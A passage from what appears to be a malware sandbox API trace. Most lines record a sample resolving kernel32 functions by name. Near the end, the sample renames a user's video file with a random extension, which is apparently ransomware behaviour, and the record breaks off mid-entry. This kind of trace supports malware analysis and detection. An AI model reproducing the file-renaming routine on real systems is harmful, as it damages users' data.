[0087.602] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.602] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.602] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.602] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.602] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.602] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.602] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.602] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.602] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.603] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.603] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.603] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.603] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.603] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.603] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.603] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.603] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.603] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.603] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.603] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.603] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.603] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.603] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.603] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.603] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.603] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.603] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.603] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.604] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.604] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.604] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.604] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.604] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.604] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.604] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.604] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.604] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.604] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.604] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.604] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.604] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.604] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.604] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.604] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.604] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.604] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.604] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.605] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.605] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.605] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.605] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.605] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.605] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.605] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.605] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.605] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.605] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.605] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.605] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.605] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.605] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.605] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.605] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.605] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.605] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.606] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.606] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.606] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.606] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.606] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.606] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.606] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.606] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.606] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.606] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.606] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.606] lstrlenA (lpString="DELETEATOM") returned 10 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.606] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.606] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.606] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.606] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.607] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.607] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.607] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.607] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.607] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.607] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.607] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.607] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.607] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.607] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.607] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.607] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.607] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.607] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.607] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.607] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.607] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.607] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.607] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.608] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.608] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.608] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.608] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.608] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.608] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.608] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.608] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.608] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.608] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.608] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.608] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.608] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.608] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.608] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.608] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.608] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.609] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.609] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UTIc28qGYhgAyb46g.avi") returned 75 [0087.609] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UTIc28qGYhgAyb46g.avi.SWg1lj") returned 82 [0087.609] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UTIc28qGYhgAyb46g.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\utic28qgyhgayb46g.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UTIc28qGYhgAyb46g.avi.SWg1lj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\utic28qgyhgayb46g.avi.swg1lj"), dwFlags=0x0) returned 1 [0087.612] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.612] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.612] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.612] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62dfe770, ftCreationTime.dwHighDateTime=0x1d4c619, ftLastAccessTime.dwLowDateTime=0xc4dbb500, ftLastAccessTime.dwHighDateTime=0x1d4c793, ftLastWriteTime.dwLowDateTime=0xc4dbb500, ftLastWriteTime.dwHighDateTime=0x1d4c793, nFileSizeHigh=0x0, nFileSizeLow=0x734f, dwReserved0=0x0, dwReserved1=0x0, 